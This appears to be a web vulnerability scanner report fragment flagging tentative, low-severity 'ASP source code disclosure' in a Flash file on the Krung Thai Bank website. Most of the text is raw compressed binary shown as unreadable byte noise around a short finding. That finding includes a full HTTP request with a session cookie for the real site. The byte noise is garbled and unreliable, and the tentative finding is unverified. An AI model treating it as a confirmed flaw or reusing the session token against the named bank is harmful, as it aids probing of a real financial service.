.P......G..\{....Zp.[..S..R.s.n...Ui.d.....\]-....:BA..c...].).....*@XK.N.<...Z)....zz..C.....A..h.....;..W..:c8.Jo....`..uN,.z...|$r.......wel.$.. ..lx...0[......Q..2.*L......0Eo...duy.&....d..V....}[.mJB..0Gq..G..g.f.G.!I.....MM...}.....%".0.
HPWS.i..5..}B..(.0J$..R..?
...0A.4.."...fGn{.3.<. ...;......;D.u5J.*......}......F.8..X..P.2..h*..EJ.....7.....L.l%.G0.....~T.......6...|.k........m....w<.D..d. $r..|.+c.........u...C...<....FNG......jTpN...B..]u.)....'.Y.'B.+I.n..@%.a.^E...
....0.Gu!.V.....)IQN.@..8W4.E'.....(.l_...of.....P......    ...[......
...a=.i....".    ...p..K&tY2..N...0...u.3.f=....l0..w..`..`.j...}..u.....F...[{v.m.J... $% .4...l.?%;I$..X)I$..WI7.6.R.5p....+....3....`......@...`...4.u.L...L"g..=...A....k..N..............q..L.w....jg.....A.qX..N...=.U....{K...y.....D..F.`......;F...F.O..QlI.Y.=.V5$..7.x.VwFXP"..>s.c.$......#{...!m.'...WH..k...}.oZ...B\J..
$]eX...^:.aQ.c)..i..]@b)I.iXBI    ..Z.......A.....n    A.....}.y.3..<....`Y.....H}.R...Q.....e...@.......A.l_.Do.z*Z.q.L.}+.ZWe.e0=...i!..~BH.~.OQ~.Z.'....V.w.O.fU=q).YV...-...H.4....u...........T...86T.$..s|z.*.t..pa`.A.3x.0`..).m.-..    ..6j.G....{
.J.z.U....|..7e...u.......P...P.k<.r.    7%.Jce...e.gZ..g<.....{..F....d44)QEK....."5...D`......[b.j....\&!....V.k.^.M.t......j..f0......b.....gB.......$..B.6...x1...^.[%.W.?.!K....R.&RJ..Z..z...l..A%Y.N.....{.4.....V.z[..T#...ud.....,?..np./@.^.}."
.h.l.!...}~..>...)...p..?..|......m.Q>t.$M.....L.u..r.%.].ym.;.....k]*.m..}`..*.R....Lj!4...R.ye.>C.......A..9r.;.:2$..    .s%Kl..#...d$..#.YQ.~H..|%/..7....Xh,.<A=.....c.....K.7..s.[.8_....g.e#2..sS^..~.|."...U!wm.d........8I(..k-R2Fy.....P.J.,..!)Rz..&......n.5....13.e.X4...LCTQ.t.Y.O.........q.R.>G..d4....`..w.[ON.Y.....n|.........3    .>    ....vi.T..]>y.DE.Vyf..>.x".q...<...y...iq......]Q...
_R.Bq.q.s.fo3.u..h.k.w.,.{.9.c.....gb&........g1.8.....t.j.....`.....$.).l(.."R.p. .M.~{VZ...EAq.l8.......,.e.........Q.&"...;..L.x.#.uRvQN....X.*md...t....d...}...I..<.......R.|t+_........a..G....1.|...../..D.9X{..<H.z:..~..;...."9\C.#.....xo....X9..v....."...!.;#.........Z.R6&.p...G..    l..4PGm....l.....>......L......0......%=.z.......o....
;...{y.......s...P.
...k....L..(n..k+ \\....Sd.qL......L...v.....G..X...sj*.l..~...'.ZS.....*.7..8$....'...Qy.
....ff....PF5....@+9...X.9..    C.....t..v.......^...p..Q$..j?...T.7[.....V..G......:H?.2...^....}.......e#C.7ELP.........v..y>.|.I9g.:..........!........"..y>l....:H"...b...R^....<...p.7...\.9...x..%B......... .7.$..RS...W....7.........>B.F/...*...X.+.8.......v..[...u..4n}...t7....0..1.....    ......)_=.M.j_..HLo...[./..zO..7...F.FB.Yvju#,yE...Z......k..6:.o.{.*_m@..L....\...
~%V>...&h.[e...&UVs;.)@3.....:....L.1_d..2.,..)$...MPJ....K/nc..H..T..d........V..`...<B.0....>....:...r_J./E..E.....1....&.(pGo2..O.~...8..F.<<..A..........7--Y.x.Id.@x..p.......r...*......>.*..Ytb...&.U.......u5#..C..t.9.........rn .<SA...........
...IA..G7[..a..x..h..h._.Q.V.a.dO...e...7.`.1.M....fI.R.._.-q..Q....E....u..~.A..?..y.e..^...d....+.y.-..d.:.jjk.*..."C|...,X_..}.."q...tM.6q~..5G.#_b_.pkh.2...R..FC..#..&...5..}    .....ln.$....oH.T;....Eh    .@....+.b.}.T5H..B..\
di...Od9.S!@.\.........<ey..H..? ..<..p...a../..CF..1.n..^.K.0..aS..q...b......U...W..h....^..H..Nn"..=,    *[.ZBp    .y..Z....F.PGi..?.....5.5.....[.....b..\.t....N0..y....4......+$..z.?...UE]...[..
..5Ls    .5.+..N..ZbL=....Y...+...l.'~cU..I..?..4.z-...P.....2{...d...d..&.R...*...T-.4t#.....~.-.f.C.Wk...]...~...S......V.UUy..KN.q.....l.Ya.........L.}...cT....o.{*.oUH..k.JS!p.8".............k.....#..,...*E_.....iG1pq.m..[    .R.

.....?..e.....)9.e.....u<S.A.Hx....n.....'.-.T....).=.h....j.5.    .[5.._..=....F.R.q...k...-.t=..h.U.%o.A.
5. m.."...E.W.ft;Y.H..J..R.K.4'..pz...3.E.d.......}...#.0...1....1.. SP\a.'{.g.b.XX|....H1}#.7"...%....:.x....#T..4.......I[`..lt.M...z).).L./_.N........J/..!r..Q....?=..D.!*...i.N..9...M..h.. ..&.......,.'.q.w....P.........t....u.....\j<A`..C......?...Tj..M...&...a..C..2......S.^...^..0.....Q...H.\IZN~?.......h.^.Q.Co.w..L..&y....nEs....."..K.l....lx.^.....3...B!.c...G....i.mT
...V............P.M..T16......%...../.p...7..e...!..?.Wm.......>.|..<..L7[.X..w..Y7.`..oi..p8.8
......._S..%(..%..,a.8..r...y.....SR9"..J.....t.kZ.....>.#..qJ.NP{.=`.).W....Z... kz....d.....ol....$.>Y..t....K..K..q..Du...(.P....+.9:1...{/....1..?.%..x...rT....R..8.......~jI.L./.%U.....).F..$.@...xAR.M.<.6.    .>hV>..}.9UCR.f....<..O.P....Eq.g.t.i=.*/.~$9.....o......].C.....=........p.O#..R.`....
U..~....^u4x.F.W..+..S}...q.....?..../.9'fs......_ju[w.....m.t......SnT}#...l...in.91.<.._.ou&7_.K....d...?*NIs..k..C..KA...<.).    ..D.....'5."...F"=j..9.@$..: {....\....y..I.u....!.....!...5{#..........T%7...}NA?}#,..m...X#M..e}...op.....c...J<..m$.5.l.o.c<.ip`|..h......x.......3E-I.....knK..s(..M...4..1.{.B=.w...B.ba.C...Xq.i.q..=.~..e..!_....n..jx..;/*..}.ac.i.<.?..........c).....p..GRs......c...:z.........Nx...|..{    .'DL...ur.....0.\..6]..v.^.^...].......?...:n...a........{....8n.l...jT;........Qi...c.<..../..J..AQ.5i.#..7{=..).'A....f..b..2....R.......b..I....9-..d...4......6EH.G.%.M........
....s.$z..-~V..".....l.n.LlN.<..j>..|...f.<    ......Q,{k......7....._S&;.._.?(Z..l@.f8.......1^[.Hd..dp}fB.p.Wpg.....J.....e..&y!N.n.W...KC.adq&.#..^.5.;.CsQ#...9#P..'u
T..#.(... ..Y....`..z.....N....>q.w~.....A..u..,...r=5.z....q....Y...(.C
yN
0.v.T.8..v ..S..@.....\......%.N.....c..Iq....j.cGS/yw.A._....WP.....c:....7....~....[...j.I...<K.9bS.5......GP.C.......}..._.N.Xj..J...of...;..j..3.*+.(S.....)!..........>....~....Q..K.......lf..I,%.?.-E.....=8Ze..?FADqz...V^.D..3-.`.T.\..A.a..Z.....`<.7.t.F5..zy_b......._.x.M2J~......X%....V..c.@.._y...~....t....S;..K.........}..Q...d....p.}.)Z6.
u2..I.=..yj...J.2.u...=.....Yp......7...1.C..c.(.*l....@......*.i....Ty..Ur,..ii..S.e.
...3f3..R...0....gZ\...6..;..H.S..o..w.r. B....f.....[.3~D....C1".*....X.8.....b.2.)
{...AI......'.5*.b.............Z}....`....gsI..p"7
h.`~-....Z..5+.5.a..&H*..bf......M&.+...wd.m..}...w.
.q..ui}".w.|...K.O"v:F.m6...'Pc.....G......|..ZvM:$3.g..k...........D........O..=...w...7.
.`q.[.......\...i./.......}...........57;...czh....R.....>nh."1...O*J1a..<.J=.>K">...9<.m.Ql..K.......^L.|.K...R^...................C.kN!....3.~u..Y...kf3.....ql<.....7.E.'........$.....7|J.g.Ru.2...Z.UaOyt....7.....gs.f.#..-...9g.1.*f?.R...>.q ...4...p.&.F..j.m~...3...(e.%{6%..O.S..OO.<E.y....c..J....f..
.{...-.l.....!..W._..~.@v..3.._.I?[<.z...Q4{.f...........r9..pY.,..]....c..d...|..$.^?......0Y&..<....W!/V.I.,%..P.......Na....3...%....3....(%.7.)..]{..
.R.`w.].....]b...]z=..".......b.0h..V./.l^X.Ld.j..X.`f.a..........KM.....|..,fb4..t.y1V..*@..!.P..w.g..Wfu....b....n...D.}Ey...>........hJh.0....{..m../..UW..Z...Z.N.~.+J.g.6.d....l.v..6.?.....q....5$\2....X.4..~Q;.+l..WK46i....($.w".yFB..n..1.?;....kH..@.;Y.b.W.p.bJh_em.~.\k..=5Q.-..n62$..Y.....!...&d2....Vf.k..n.:.Eq...<$.7....,.E.......0........\;.......GKg.R...p..._.#g=,2..    P...a..<5fM.....?..h.=1..?........X..6....<.-.6HM?0(.t...W2....).wm..*o..v..    kr....M[e4c..7../p..w.9..{.1lo./..mh.X..v.s.S.SC..../.;.>.s.D.0.c..|,./.a.4<.9}I.. .........o.$.....W..x...@Z.(..b..1.$..~g.... ......s..p.Y..........-......j...e...=0N.M.....T.x...J....$..z.n.........S.8..=...j./&{..w..^....z.S.i.e....Yz..dc.7...5M......!..A........\a..w.\/@..c
XT..1v.'.^.d...c..m..e.G....2.E....iy......l..f..:.7.1..3....R.r..7)...........U. .........'qu...'.Jt..a]...Ge........c.(    5.|j..l.....g.S.......z>.....6...k...Zm!R?..k    ...N....~d.<6.5...h...B    ...M..S:@.n..(..T<.-PL...ctWz.!......vk1...e....9=.........F..c...u..5.....(.k...,.
..B..cU.=...M.E..... ?.;.....?..)f.]0...........V.......s...6.MHl."....pI.......D.P.G.Q....84;.*B.Y.@.2..e.I\....\nQE.W.?..P...e.o...Z..X....W..e.,..c...fg...D...5..-..v.+9..1u.-b..}..&...T$....W..v....@
l.b..QH.%...q.7~=}..k.m.....Y..qp>......tV/..f.........y....;.G..E......G..!.....C...4..D..u..C....Cj[.Y....>1..}H.0y7.v.....`....|w.O..`.%,.@..
..vU8......\y!..D...h.......O..}..t.._.".....    d...p..m.....T....#...<.4.@..g.....%i{.al...Zm..9@'=..)\...._.&._Td5h.f    .......6W<../^T.?....g..`kd.....`..J...._..A......M.%=<,..o..e.6R4...,.......^gl..w...\Gl6.p.I...l.F.....g`h.....s    .L%.i.Qi.q.am.>.e...p.(..|...d=.f......].....\]..%......u...l.... 7z.... d..nm,G..80...OVr.o..........'......?...3%.}.n...4R.....v.%>.M}...%...a...e.,c..V.).t.R.R..P.. ]....f . ...6.>.w.'.. nn.wb.<.o..t........,.....$p.y...![+F..y..C    ......08...CIj{G09O....<&......z.._...c?.....g...E.?.d...M/....NZ...b
.......x:
.....w..H..&...qM.<;....w}:.s...?8.....:.P2Z.m.....Ee7...S..e7.}..cW......BHaq...%e..eP..B..".|C?.......[.c"/}..........X...X..zs...    Rbaj......@p.O5.33r...T0....fTI$5...k.....H.....g...B.[5....y.p.0g..>a..w.)qEt..d....`...)8W...=....{...s.6..Y..^{~....UN..+..8..e5O.....$.[.3....1.BCs".s..^j..i..S.`..-..i.5.\.........n.....E..J.t9.S.A5......E...>...K..F(...t;....|^R...j}..j..&.?8...[.4..<9YK.....(3..2D$1..4....K.)...Jt=...I..........4K...K..+.).{^..XP7.h..j..nt....$......s.'..Y..fz[........j!(V*....E....F\x...6(*..y.U.(.Y....v<..w....D.`N...........E........|......U...H.13.....{~Rr_.EL..j.nu....FG.c-..#D.I.....K.0(.)nu%......g.K.....t..H.8..J}...G.../3!.5N..9........W..Fj>v.....)Ia.....e...K0=..N...O...Z.\...e..x.Fu.i8....=.......K.U....*..~Xqb.    D....fP"%......z..3.....e.7...T...P6}.D,.|.9....I...p.A2.a..Ovb.hw.g...\.8....]..:*..[...3..P.....OM..a?....".@[L..w.Sk...x..i..k..?......}..d..7...:.z.....S8.l....z.E..pj......,.EYp..uz..C......rs..Z.uS.....b1....7..)...L.........x.8....\.?.)..w    ....f..........G.+......W.B..?....
..o?...w...6.o...,...3......%.....O86Q....4].....r.SH....k...+..5p6O.....o,.#.i.&N.....<...v.=..5.e./7.O.9w........=...{..h...j.x.W..M1.h...:.k...y.&...=.4.~..l/.E.V....$
....TO*1....k.5^To..%K..U!....|+.Z.+W1..G:..=.=..L.\e.*..i.x:bY.'z"...../..=..d..'.v..-=h.Z.p.l.=    .Z."....|.....]..m=....Y(Sq.<P.*+.}.RR.c._.O.+_....f...)..n..q...]..........."GQN.k[.j.N.i[...w....xP5.T-.K..L].%U..-..a..Q..`..4..8..$...E.Um'kb.l.b&.Y...|.>...}.....\[...z...t.#).......e..F`.......+.}-+.\...td}..<.f=..W-C.......k..me^.u9......_.N...L..w.).|...+.o.y2.0O.\.....c0..F..Rw..U0#..~......2l.B..M.r..M.......7....\&Sc..4...5.$..."...4.S^?D.LN..-n5%.........*...y.!.8.1..b......e.....$!......:.-..:{."..)D.+..([...m..55+..[.S....z.y,..V.`y.........C.....P+."....g..v._z........T*g/....5...P.h.lQ...........q...M.V<...~..I.......JZ....cd..a...}Q.p.`.*..CI+w..C#.......%N.0J.u...A.]0kr.y..`....6".(.|..J..w.F...33jY...*....hQA..Ma:..dP.X..@R3zG.l...H.^..].5m...@..&0D4%#A..r..L4..o.D..    H0...U.o.P'..E.....i....e\........g.ZU...k....GkC.^D..Bx4.....T)...B.~uV|..h. ........U+.g..........>i....y...3.......I.7.!........P
H    .w(.....,......O...{/....q..l}...J.<
...J.......SA&Z.....u.$(.GS......Z.+nj.L.7...
..N.Q.59..F..QR<!BV%.8.....o../v\.I.mp-...;....'..O.E.a.......{.h.c.._......p{V.t.4.{.g.....D.....n.YCVt.........7@fs i..i@.    .$...'....`p....~h....;pE...K. .\m#Jn..x&.k.`=...-3.......~oS)..'/.EyH.F7...@.......Mr.......&.Wp....=(^.....Fa+q..L..D[....7Q.5....eo...V0......E..X-2....L}t... .e..!...L......3^..C...2Z.'."......<N.......E'-.z.1k...s..4...q.."...=....0..1@).TR\Gm...`2..:.Re.c[p.... ..:......l-0."....N..%.u..Xk{G-...T?.....3...w..).S.....g....T.,9N#..+..5..zo.........OmxQl <'".JNr..&}........q.+.Y.. Ct.5NB..*i.g..I.vdb....../.*7AC..6.+...hB..' Q.b......D6..8..@.s....8..S}]..V`.T..0.<.?y....2.1..).*......h*...W...^..z;..S=......@..a."....i....J;qZ..Y!!.ED    ..._C<.qA....(......h_......T1'..w@....+.S.r..>.
V..L..4!.....^...&B<.<......#. $.p._.<...vqVNfT.....j,9.?..iqlX=.v.61E.r..hF...$...<...P.l..&b.6+P...........2..x.i:M.1.....f.*1.<K.^...E.f$.6.....0.. ..av.....L.}......4.....}Q..q...D....!."#=^N..).L.`..O.......HG...q.O....Ya...A.CD..U.1.n.`x.}J.t0...{?..H.i...G"2
k.. .l..<.vD...
7.B.....U...W.{..N.4r.....,p......v'.Ua5 (...WL....V.,3...(....5.*....V(.O+..0.:;..u.M...R2..e..D.TJ..B......z..wA..j.....In*(r(.'...R...d;D..;.p.%F?...*...."...)........'..GZ.n.zZ..K..8Z?>
..mA.<zz=..T...M......b ...a...l+....&.....[...kwQ.&...j...1....{-..%NF........A}\nq.y.U[.Jw._V.....|.=....wkX...OO....E..
[n/..v.{fS...../.....~..s..t..~N......@.M ...W..J.Nx<...U.....Ai....;.2...;.
...[SNIP]...

18.5. http://www.ktb.co.th/flash/d3.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/d3.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /flash/d3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:17 GMT
Content-length: 141734
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:28 GMT
Etag: "229a6-4c723a14"
Accept-ranges: bytes

CWS    g...x...wTS..-.. .:.Pz    %.D `P.    5..,.J.^.D..*.B.-`....Ti
.E@.7.U..r.....q.q...qW....g.<e.5..{$.@.{........z\..........d'....]..
.4.............'..^..g(...v.....`.q.q.p..y.......m..z........#.
...[SNIP]...
<4...Wl.. ........e.........L.J.....Lm.y.-..@.}.7...I..z9..K..?..g.`[S............/....\H`T.[I.$.,.cY.Wo..HH.#\5`Mc....3....+..I....<%.g..!.Y[O.....'K.J.....sJ..|.+..K.....-a.....[...&.rd.."....}.."~jpE..{q........E&sj.,)R.^..;j.. .M..?K(."....o...0u.1."G ..l.K..z.B.....Z...>..
=..L.......V.e........^w{-......S....p.}.....\..P)52.r....Y...>    &.1...f>)..`.}..1Z[.w....^VQ....8...S.Z..7..].......N%.=.s_S.b.t.}#.%>
..^.d..rn.W.v..G.j.......Zb...{...H..G&.rl............\[?.<..a.T..~...p...{.$..o...1e....pp.u.....9.7...7......!v..W...q..*>
...[SNIP]...
<.Q}.i.....M)...!.-..9..&I.'.#.r-,Y...R.;m.Wt...u..<%f.Xzx...N..?.Nf=.ctnq./..1
.it[.AW.'...C..V.....a.....z..:3..p....rB{<..E....I......Zz....~iyz.4[`.w.i.....7...
... .`.eVQ}.....N^.....?..o.ah.O.....q.G.........O.t?.E. .?...0....8.+..4.?.4.
.6.@Gl.......o..B.F..C(..J'....Pk.u.    9.l..6...G[......w..'.a.+....k.......,lj.a........?.......r(n..9.u,...c........$...,#.)J...o8.n.,k.....&.(......4}.....v}U....S.s.....0)..[\.2..
..\H....ZU..5c..M,.}}..F.N.;..j...C.b..@1.R.....]i\,:T..ig.5'*gB..g.8L"s.!t../x.9I?....Z..a...X..1.w.z..Q..O7..a..:.+....pjeb...oZ./....V.=.s..QP.;~.`xBz..+...k..,...q .._m0..z..s.4h}f...[J.....1IA:4..Y.=f.y2..O....;.^,%.pO........f..<.....?.......I*[...Wm8    ..~...h.9.....5S={nM.|.2....U,..$[nL&...hN..,...r..+k!YHC.^.rpy.sC..6..1.'k.O..(V....P.5..t.S.R.G...:...m*Y.i.A.m'Oj.....V;.~$.Vt.iB............bVP..).....o....6..W.x....+;..a..:..8..m".s...S^j..p/.-..a...s...!0A.k..kL.l.D.o.h..F,.s...].x.U^g<I9f..8...S[.O.b.3....;....A.vL
..;.p...a@=M}..w.. ....G.,.h.H...+..Qe._O.m..o.8....b....D\.    ....t.......vu...LUK2....V......$..q.Sx...h.........(.>.X..uh.......jR....y..^....DYd.q...S.....3Q...~C...t.B.zt.Gxt..H....m
.Jj...|t3......).g....wD......N..BT.j.u.A>...2...c"E.<{Bn...,.......R..MI........g.?.....^..*0RZ.%7S9........U...Nw7..-3.]....d.H....i=...MxT> ...n....{._..r...[..Ms..... ;.B    .#dUHS...o....q..8.({....M!.....#....^...=......t..o........-........[..o.B-.k.....s"    +.qFf....\,G`.sE...?..TdR.... ..F.....3..o..Z...3..._/k...0.^3........../...k$<.....F..>F.=...\b.%d.:....`Le..{...i.!-..ZaJ0.+.......A.@.W......R..1l..[5...0....%(hW.^S..R.....H.+Mb*aV.F..@&<m......,.....,.>.Q.3.......ie...:    .....]....C.+..t.fB...q~...\h..a~f..o...\~.Fn......h..EaQ.I{..$....z..m..L.h....r0.2........    ....k....X...XmV.B......R....#....L{..(.......|.....0...:.|..    ...f$.U.    Z.7...h..V.BP-....(..4........L.p..P.Bh...*....Z......&\G. .vd.-...<L..m.'t.1 .#.R....Qkv...:..d....w..7.*@...uK@c.JJ...e1?.u    .(.]V9.. .-.>F..Zg.;..\.>z..oE.f.yh.9C....;....R....J....H,TDC...}..0N..V.oL.....
Ykn_..7}7,.{...)....%...R..[.......E../l..f..z......:....b...@:..s...H..&.._.S....6.N=.!'.'.,..o...WY..>...>..}I\.`...f.......y.......    e-_wk......t5.h....`.G.8...4P5jh.'..<i&X_hD.d.#..|..Q......o....8d    ...y.....o.2f....C......>..B..=.h..8.U.q.1p..U.6....Z....&..*.c.].`.*....56.5\H].hd..s.?].j..|..z.......5 M.k.\..5o.M6.V...*...l...-.%..B.=.].h].......Z....J.&E..y.e.....bB...^....1.m!...4"...y.mQE.. .K.&L..c.tr#)..    h..c_.W..w......c..,...\..S.h,,..g.^..8..\s..i.[.H...fB&.i.
J.....9O...f.....%....6ol.T.R...:.@n.)...U.........s.........Y.OO.x..(n+].."6/..    ..u..u...M.LY..G0`.../.*.P.|j.,64$..b_vf.>sRZ......QB.....a..h...zle..f.......Mr........JMf.LIh$qW..vZ.#Z\........='..>P...Y..}u.cF......h.+F....+...w...;...`..,^+f...psl.M"-.O....1....k.(.c...P+.........ZA"1.$;"...........^.&..Yr$+:.u..o-[...mc.c..r...x/j.9../La.hU..$......=.2.........1..............r....l9.wL.^...yP.n....;.r..x...CJ\....`......\.b....j..N.....D.....\..>.K.....3. &g9.\...&.I...F}dH.....R...O.?GS.....+.......~....0.J=...E.b...e.......vgX..k.7w.mtm/....D...+x.0%.?.M+.9...U.c...}.(?.|...v.
.F/#.3.z.0>..y..*.u....{=5...K.G....i......:@.I>@K8..c*...ey....O..1R.5T..w....w..!g....7Z./.q..LA.#............n..zi...%.XDw?.Q..u...tLWl...2lZ&zJ...I...7y..Uo...y...,.|../e?.0.3&.$.L$........V..F..$..    ~...9J.+..6.n...$.<.L..}.P.D7.0U....A.. .t2../...f.8d.t[..,
.b.o1Lu.~..r.[.ca'y..C..G..J.C.y..+.u...v.._"..^......}4I.D.!P..    a._.9.N.8....5..q.z0....f.8...i.....l.....r.q.....Q..}cw....p`j.........C..m..l..g...{...............}.S.>?.8.l....+..q.......`?.#..u.a..1..NU..G6..Os....s:.W..THG.^.....Lx...X.I.H....Q.o..=.).P.........P.k))..#..[.z.!.P......."........s9_..........O.+....?..0Py......."Ek..j.Y...)`7'.2.....m-......O....s.5..z...7.6J........B......?..D.V...[......K.MY....[.....:....+~~A......*;A.D...&+<K6i_ )....o.V~!..aJ.......Ik`.H...i.n...#....*3a.o$6.T...1..Bv....Y..7.u5\fY;.?.~V...*...#..t.``...=...!Qc    .U.W...@.K..-..=.\....._+......F.Eu..3.Z&.F5......k....2....iz.B.9..F.3.&..U.A.3..!".r..U....1.c9.....N..k..o.........%
4.QTI.............O...W.1q6.p;.N.-.)f.=........*..J..A..e.O.K.".#....lf .\0.@..t.W.C.Z..3...)a.fG;.    .$..ZZ..\.bw.O..F[;.....i.....!.....TD...L=.bYH .r.J]..m+.............-..QaO...p..*    .........j...R....T(il.......Td......`....?.d....S...I.o..uvq...d+g.y..@..Q".g.....4lJ..4..m....k.....G. .........?\2i....3.QX.)....eg'.s..UDKr.7~...4P.i..J.?..9..1..E.7b}w(......-.W..<...{.w.+S(....(T.{3.....f.w.4[...vK"3W.z............n.B.]z..J_....q.l.r$..6..&Lx>!i..vaq..4.i......J._..d...GCG.\.Y...x#....d.^|..Q.}1...(.As"...W......^..5.F..l.IK..n.....[...g{.....*j....9gJ.MY.2.0.1x*......6....|.n....y. ....'...A4..:.(...PV*...!$...........4..^..l7QG...
.|j8.....{R...Vk...u3T.x.....vH;..uP2t_....Q!.e....Oj9.A_...XE.P..O....m...w16...Q.`KS.z..K.....45`..*.C.J)/.....v3zh.._..$...Kk3....<D...w{..P}.x..<...8>Cu}3=.`,...A.RX"..!....K&M&...    .r...S..$d.fBV.q.H....~........&E.q.~.. .+7+..liD.l...sY8g..#v.U.s.......|lq.A...^&.m.c.i..s...On....y.. 6..T<....|...{.q..*.M...$.6.`.../{).^'.....j.oNSz...-...M..~>...p..?.... ..."w.\.!.....s.5^..U...#j...@u.z...S.1...sln0.'...=..........=..5...../C[...._.../.,.).=.*.O..=.....w1.0...U....s..vp..hr..........)o^0.n......nmy.`.<....7...h.......N>Ww4.hFk#d.r.Nk.n...F.>.c....L..V'..<..=..6.~M..f. .2....).Q..'......~..>...?M.ET.Y.. ..._...    ...x.q.;R=.zGR...*.i~.=*.X.'..*...vb..N.?3..f...-...1.Kl|..^vu.p..~.h.Y.8.,n.....a.\..y.>ph[.I^-?N:...5...r.v...J)";.x...W.rK..j...Rl....(.....DnX..!.    .o...b.Q....$........4U~..l&....#v.T/.?..X..!..i...4B>.B.?...of..~j.d.>[...O.......@..c.M..\..Z,.@t......L..`..CS..e.T'.s..I...i.....e .c..w.I.W
......M=..o|V.j..r~!7...4.-.......:..^D.......;E,..a.H......b....U..G...+P.2...?#.A.lz.w........G9.,:.C'r...m.'..}W?...0@-s]..:O<.f".DCu..i.......&\..k..J......+..C....i...]......G.Y=........go.U....#Q...X:.M".....>4..H%Dl..O......Fq.......!<....zV.9..7.w.M.. ...w.g..t[>....
....w(...;...)8Kqr..l...;F......U,...o..r.9..]..H..$......._"...5Z.k..I./.i"y+..
.iH..W....M.w.N.v.O.,?.j...    .h:...M....OuEjZ.w......)?5w."..=.r....n..e...+......).....Rc.UF...(0YL..0.....<.zUF..h0.[#-..........!.he51..*..`!..T.M'Z......W...%..3..t>....=....vz.'...
$x..t.pR{...h..{o.5.'.A]L..+...4...)o...~..I......(HL.........A....qY2.X.,..Qy.......ZX1...0..+..V.E..._{'
.b.{.    ....g.-......?.].(.Z(.3,aKt...=?.f.....`d."....n\..6........g.#_...}....Jz..]
..[..=,:x.mW....3.Z....x..E.#.F6Q.&...    y.=.....XBAz}.ZbS.....}.'.....=6.y....U..&;........pr..nH.d.i7.[..|%#......R4....'.......c..5..vl....g.?R....b~dU...pe..1.+...~...$L......Y0....9.,........C...}_.s.....3....jNG.&..,....QQ.s....5.e:.p){<=...S...g^.(..?|0./;..>.1..b..G.j....c.P.j.u=0p..3..i....x.......Z..F........o%...0...Y...%.s..........G...a.P......}.*.".@-..k^.    AX....<%*%.......H.J3....f.=.Pt....ns......P.5S74...d...MR.)A.:..$..zk........u.....:.E;.}..Q.[....v...E..$.z..
jg.[s..=...v.",.|".'H......./27.j....v`..=.LL.~..z......r.>.....\].gF.j*..k x..({....Y....nz..>
[...E.V...i`qs~].
.......K%.....`..Fh.L..90....7..y.2....7...l16..y...I....F.........s%..*..f*..l'=..D.pG.3q)y.`0%..D..8.......S......V9Q.eC......&...+.........%...J...W..JZ....9no.d..$.......6....=;9../..c.Vvj%....Z..T]%....v.&..>..W.....i.(.....[..F......Uk3.p..D..7..g'.Uv$..C/#FfR.~..1..a..N0.-..O.V..9.~ .....3..H...pd..q.{..T]....q)].o.....N......5.>....p....5.JY3.%.@k...{.........!&....nt_].on V.4..7[...)<.~t4.......|.....>...0.......Z[P...`|..0...cC.V......_.....@2....s..r.N..    ....8LK(...D..)@.V..$... .tf.....U.v...."aPr.D.q.....B....1....K...&.$...........,......M..'1`e...."j:....J    "....,..?2....'.@.!.u.,i.f..N.....6....2    ).b.".B}.f*gD0.....*........"7..:...0gITZ...-.%..L.g..`o..............*.!.....z^.P;..M..2d..f..O.|B........1.OT...%..=+..........C..dp.. .....,....='....U...-K...}}.?K%..5...7.......)
...y..?.n.Q.
..7..0....0.RX32b?..3....?......EcX.u.....E..M.E.......H....i.}..1.CM.s.f........gA......<......f...N....t
..T.......k.QY].I.i....._.'.o..V..v%.O..y-.*%#G=...XUI`...+.4r...}......E_r.t<<.......@T..5......h..`...I..?.u.$..J...V..n...E;...\P.._..U...`C).1....N..BJl0jp.>..U..{...(..=u..4..r./......K..q..r.c.\.s...`...^..."E...^..s..D....A.m..j...}g.H.U.{A.1.o.....I....d4....W..*V.....U9 R.=U/..:O`.y.W.['.A.....6.Q..g.>.C.....#h+.....).O.....K.dq...........>H ...s.+..x.....U..a...D.`....5.T.GIv..rN.-.......(.d..=.^3.S..._..    W.._...z+&.....?........{..0..P...v,.."b.R*{..G....+,r.7-....].H....}M..A.....w
....v..i.%.    V.@......hgV.......r0..:......G.>Mu|.._....,|..,ETj..|...)gi.jy.......M
..p.<^(.S..'@.;.<...M,......J$.-.......B..'....r_.......*A.G.P"..\..<...L.Z\...*...IL..Yi..K.+o..@I.E...C.:.[O..9...Mq2NOg0_ZE..5\.EsU..Q:k..].T.......<.uSn{...).Y...<..#..q......1tT..F.(..y..    ..OH!......O-_%.cT...c......(.]..R.J.?.K...=.W....#..%..K.V...[...;-.kECNX.U..f.A4{*....Q.m1.....)..P...=.I.m..%.;pj..w(.L.y
....o.t    $.......0...}z........9.)>....C.C.e}.2+.OH..g...*Y.B....4...-N+3^.[2.?LY........0.....[;}.Y....k.v.}ID..(..........Y.R!*M.1........yv...73;.=G.u.!.....k8|...k"]...xj...Hk/.ci.*.B&[!........*.&S.Mqu;XZ...Wd.W..l6.<....O~.j..VKx9H....vtU?i+rkC......>].vT.5$P....
..........f.8.Y.yb...Zhyn..Y...._..&.f....k..j.....S..?...`8^.s6.10.^./..
...........G(.....1.....|..2.6..T...?......l......mQ.....G.......+.l.j.m..h......KF.~..2.8;l..O..|.....o.s........Z.y8..d
